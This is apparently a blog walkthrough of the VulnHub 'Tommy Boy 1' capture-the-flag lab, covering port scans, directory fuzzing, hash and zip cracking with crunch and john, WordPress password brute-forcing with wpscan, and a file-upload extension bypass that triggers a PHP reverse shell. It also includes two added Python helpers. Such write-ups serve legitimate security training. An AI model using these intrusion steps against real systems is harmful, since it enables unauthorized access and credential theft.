VulnHub: Tommy Boy 1 walkthrough

S_K
12 min read, Nov 16, 2022

Description:

The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.

Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr., who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit! The VM is pitched at OSCP level.

Run netdiscover to locate the target on the lab network:

# netdiscover

Netdiscover Result

Nmap result for an all-ports scan

nmap -A -p- -T4 192.168.56.121
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 15:06 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.121
Host is up (0.00055s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
| 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
|_ 256 56:9e:71:2a:a3:83:ff:63:11:7e:94:08:dd:28:1d:46 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
| /6packsofb…soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-title: Welcome to Callahan Auto
|_http-server-header: Apache/2.4.18 (Ubuntu)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: KEEP OUT
|_http-server-header: Apache/2.4.18 (Ubuntu)
65534/tcp open ftp ProFTPD
MAC Address: 08:00:27:30:25:D0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration:

Fuzzing the site on port 80

ffuf -u http://192.168.56.121/FUZZ -w /usr/share/wordlists/dirb/common.txt -c -e .txt,.php,.zip,.bak -fc 301

v1.3.1 Kali Exclusive ❤
________________________________________________

:: Method : GET
:: URL : http://192.168.56.121/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .txt .php .zip .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 301
________________________________________________

big.txt [Status: 200, Size: 184073, Words: 21, Lines: 20470]
cgi-bin/ [Status: 200, Size: 745, Words: 52, Lines: 16]
cgi-bin/.php [Status: 403, Size: 301, Words: 22, Lines: 12]
index.html [Status: 200, Size: 1176, Words: 164, Lines: 18]
robots.txt [Status: 200, Size: 132, Words: 6, Lines: 6]
server-status [Status: 403, Size: 302, Words: 22, Lines: 12]

Browse to http://192.168.56.121/

Site index page

Check the page source for interesting content.

Page ViewSource

Contents of robots.txt file

Robots.txt File
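A robots.txt is a recon source in its own right: every Disallow entry is a path the owner wanted kept out of search engines, which is exactly the list worth feeding to ffuf or curl next. As an added example (not part of the original walkthrough), the Python below parses a robots.txt body into per-user-agent groups and turns the Disallow paths into absolute URLs. The sample body is constructed from the three entries that are fully legible in the nmap output above; the fourth entry is truncated in the scan output and is not reproduced.

```python
"""Pull Disallow paths out of a robots.txt body for enumeration.

Added example, not from the original post. SAMPLE_ROBOTS is constructed
from the entries nmap printed for the target (only the legible ones)."""
from urllib.parse import urljoin

SAMPLE_ROBOTS = """\
# Callahan Auto - keep the crawlers out of the back office
User-agent: *
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt
Allow: /index.html

User-agent: Googlebot
Disallow: /
"""


def parse_robots(body):
    """Return {user_agent: {"disallow": [...], "allow": [...]}}.

    Consecutive User-agent lines share the rules that follow them (the
    robots.txt grouping rule); comments and blank lines are ignored, and an
    empty "Disallow:" means "nothing is disallowed" so it adds no path.
    """
    groups = {}
    current = []            # user-agents the next rules apply to
    expecting_rules = False # True once a rule line has followed the UA lines
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if expecting_rules:     # a new group starts after rules were seen
                current = []
                expecting_rules = False
            current.append(value)
            groups.setdefault(value, {"disallow": [], "allow": []})
        elif field in ("disallow", "allow") and current:
            expecting_rules = True
            if value:
                for ua in current:
                    groups[ua][field].append(value)
    return groups


def disallowed_urls(body, base_url, user_agent="*"):
    """Absolute, de-duplicated URLs of every Disallow path for one UA group."""
    group = parse_robots(body).get(user_agent, {"disallow": []})
    seen, urls = set(), []
    for path in group["disallow"]:
        url = urljoin(base_url, path)
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


if __name__ == "__main__":
    # Print the hidden paths as absolute URLs, ready for curl or an ffuf -w file.
    for url in disallowed_urls(SAMPLE_ROBOTS, "http://192.168.56.121/"):
        print(url)
```

The function returns the paths as URLs rather than fetching them, so the output can be piped into whatever request tool the engagement already uses.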

Content of flag-numero-uno.txt file

Flag 1 : B34rcl4ws

Follow the link https://www.youtube.com/watch?v=VUxOd4CszJ8 and note the interesting words.

One of them is "prehistoric forest", so I try /prehistoricforest as a directory name.

Go to the /prehistoricforest directory

/prehistoricforest landing page

Next I try the name richard as a directory. Visiting http://192.168.56.121/richard/ shows an interesting file; download it.

Download this file
Downloaded file

Run exiftool on it:

Result for exiftool

The metadata holds an MD5 hash:
hash: ce154b5a8e59c89732bc25d6a2e6b90b

Crack the hash with an online lookup

Cracked hash

Cracked hash: spanky

Log in with those credentials

Credentials

Within the blog, we find a post by Tom Jr asking what the password to the password protected post is. On this post, there is a comment by richard, telling Tom Jr to check out the /richard folder on the server.
Looking through the other posts, there is a mention of another path thisisthesecondflagyayyou.txt. Browsing to this file, we get our second flag!
Content of thisisthesecondflagyayyou.txt
http://192.168.56.121/prehistoricforest/thisisthesecondflagyayyou.txt

Flag 2 : Z4l1nsky

The FTP username is nickburns; after a few guesses, the password turns out to be nickburns as well.

Log in to the FTP service on port 65534

List all files and directories

Read the contents of readme.txt

Now check port 8008

Port 8008 only serves its content to an iPhone user agent. With that user agent set, the /NickIzL33t directory found earlier loads.

Directory Brute-Force

After a run with the out-of-the-box wordlist, I get zero hits (beyond index.html). After trying a number of other medium-sized wordlists, I still come back with zero new hits. As a last hope, I switch to the huge rockyou wordlist; time to make a coffee.
A number of hours later I check the dirsearch output and find hundreds of "matches". Not all of them have a 200 status code, and only one of the 200 matches actually has something of interest: /fallon1.html

Visit the fallon1.html page
http://192.168.56.121:8008/NickIzL33t/fallon1.html

Content of hint.txt file
http://192.168.56.121:8008/NickIzL33t/hint.txt

Content of flagtres.txt file

Flag 3 : TinyHead

Download the t0msp4ssw0rdz.zip file. The archive is password protected, so I build a candidate list with crunch from the pattern given in the hint:

crunch 13 13 -t bev,%%@@^1995 -o tommy.txt
Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800
crunch: 100% completed generating output

Extract the zip's hash into a file for john:

zip2john t0msp4ssw0rdz.zip > hash
ver 2.0 efh 5455 efh 7875 t0msp4ssw0rdz.zip/passwords.txt PKZIP Encr: TS_chk, cmplen=332, decmplen=641, crc=DF15B771 ts=9AAD cs=9aad type=8

Crack the hash with the wordlist created above:

john --wordlist=tommy.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
bevH00tr$1995 (t0msp4ssw0rdz.zip/passwords.txt)
1g 0:00:00:27 DONE (2022-11-15 12:33) 0.03624g/s 566600p/s 566600c/s 566600C/s bevH00tq{1995..bevH00ts`1995
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Password: bevH00tr$1995
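The crunch mask above is worth understanding rather than copying: `,` is an upper-case letter, `%` a digit, `@` a lower-case letter, `^` a symbol, and everything else is a literal, which is why crunch reports 58,000,800 lines for it. As an added example (not part of the original walkthrough), the Python below reproduces that mask logic: it computes the keyspace and file size crunch printed, checks whether the password john recovered is a member of the mask, and gives the candidate's position in the list. The symbol set is an assumption taken from crunch's documented default; it has the 33 characters needed for the counts to agree with crunch's own output.

```python
"""Reproduce the crunch -t mask used for the zip password in plain Python.

Added example, not from the original post. crunch's -t placeholders:
  @  lower-case letter      ,  upper-case letter
  %  digit                  ^  symbol
Any other character in the mask is a literal. SYMBOLS is crunch's default
symbol set as documented in its man page (assumption: 33 characters, which
is what makes keyspace() equal the 58,000,800 lines crunch reported)."""
import itertools
import string

SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "

PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": SYMBOLS,
}

MASK = "bev,%%@@^1995"   # the mask from the crunch command above


def charsets(mask):
    """One charset per mask position; literals become one-character sets."""
    return [PLACEHOLDERS.get(c, c) for c in mask]


def keyspace(mask):
    """Number of candidates the mask expands to (crunch's 'number of lines')."""
    n = 1
    for cs in charsets(mask):
        n *= len(cs)
    return n


def wordlist_bytes(mask):
    """Size of the file crunch writes: every candidate plus a newline."""
    return keyspace(mask) * (len(mask) + 1)


def candidates(mask):
    """Lazily yield candidates, rightmost position varying fastest."""
    for combo in itertools.product(*charsets(mask)):
        yield "".join(combo)


def matches(mask, candidate):
    """True if candidate is one of the strings the mask can produce."""
    sets = charsets(mask)
    return len(candidate) == len(sets) and all(
        ch in cs for ch, cs in zip(candidate, sets)
    )


def rank(mask, candidate):
    """0-based position of candidate in the generated list, computed as a
    mixed-radix number with one digit per mask position; None if no match."""
    if not matches(mask, candidate):
        return None
    r = 0
    for ch, cs in zip(candidate, charsets(mask)):
        r = r * len(cs) + cs.index(ch)
    return r


if __name__ == "__main__":
    cracked = "bevH00tr$1995"
    print(f"keyspace: {keyspace(MASK):,} candidates, {wordlist_bytes(MASK):,} bytes")
    print(f"{cracked!r} matches: {matches(MASK, cracked)}, rank {rank(MASK, cracked):,}")
    # To materialise the same list crunch wrote (about 774 MB on disk):
    # with open("tommy.txt", "w") as fh:
    #     fh.writelines(c + "\n" for c in candidates(MASK))
```

The rank is a useful sanity check on a crack: bevH00tr$1995 sits about 15.6 million entries into the list, and at the roughly 567k candidates per second john reported that is about 28 seconds, which lines up with the 27 second runtime in the john output above.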

Unzip t0msp4ssw0rdz.zip with that password

Contents of passwords.txt

Sandusky Banking Site
-----------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
---------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
---------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

The /prehistoricforest site runs WordPress.

Enumerate usernames with wpscan:

wpscan --url http://192.168.56.121/prehistoricforest/ -e u
WordPress Security Scanner by the WPScan Team, version 3.8.20

[+] URL: http://192.168.56.121/prehistoricforest/ [192.168.56.121]

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.121/prehistoricforest/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| —
http://codex.wordpress.org/XML-RPC_Pingback_API
| —
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| —
https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| —
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| —
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.121/prehistoricforest/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.121/prehistoricforest/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| —
https://www.iplocation.net/defend-wordpress-from-ddos
| —
https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.5.3 identified (Insecure, released on 2016–06–21).
| Found By: Rss Generator (Passive Detection)
| —
http://192.168.56.121/prehistoricforest/index.php/feed/, <generator>https://wordpress.org/?v=4.5.3</generator>
| —
http://192.168.56.121/prehistoricforest/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.5.3</generator>

[+] WordPress theme in use: twentysixteen
| Location:
http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/
| Last Updated: 2022–05–24T00:00:00.000Z
| Readme:
http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL:
http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.3
| Style Name: Twenty Sixteen
| Style URI:
https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead …
| Author: the WordPress team
| Author URI:
https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| —
http://192.168.56.121/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.3, Match: ‘Version: 1.2’

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:01 <================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] tommy
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] richard
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Tom Jr.
| Found By: Rss Generator (Passive Detection)

[+] Big Tom
| Found By: Rss Generator (Passive Detection)

[+] michelle
| Found By: Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at
https://wpscan.com/register

Password brute-force against the user tom:

wpscan --url http://192.168.56.121/prehistoricforest/ -U tom -P /usr/share/wordlists/rockyou.txt

[Interesting Finding(s): identical to the enumeration run above, omitted here]

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:02 <===============================================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] — tom / tomtom1
Trying tom / tomtom1 Time: 00:16:55 < > (24665 / 14369057) 0.17% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: tom, Password: tomtom1

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at
https://wpscan.com/register

Exploitation

Log in to WordPress with username tom and password tomtom1.

Go to Posts > All Posts and open the draft.

The draft supplies the missing numbers, 1938!!, so the full server password is fatguyinalittlecoat1938!!. Log in to the server as bigtommysenior with it; the credentials work.

Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

List all files and directories; the next flag is there.

Flag 4 : EditButton

Browse the filesystem from /. Under the NickIzL33t web directory there is a new subdirectory, P4TCH_4D4MS.

Visit http://192.168.56.121:8008/NickIzL33t/P4TCH_4D4MS with the user agent set to iOS.

Upload the PHP reverse shell with a .gif extension and intercept the request in Burp Suite.

In the intercepted request, change the .gif extension to .php and forward it.

Start a netcat listener, then visit http://192.168.56.121:8008/NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php to trigger the shell.

Check the contents of the .5.txt file

Flag 5 : Buttcrack

Concatenate all five flags: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
This string is the password for the LOOT.zip file.

Contents of THE-END.txt file

Final Thoughts

Loved this VM, very well done some fun quality hacks and very well themed. I’ll play more of these for sure. The only gotcha I’d have is not having taken into account the year the movie came out for the WordPress dates, but that is so minor and insignificant.
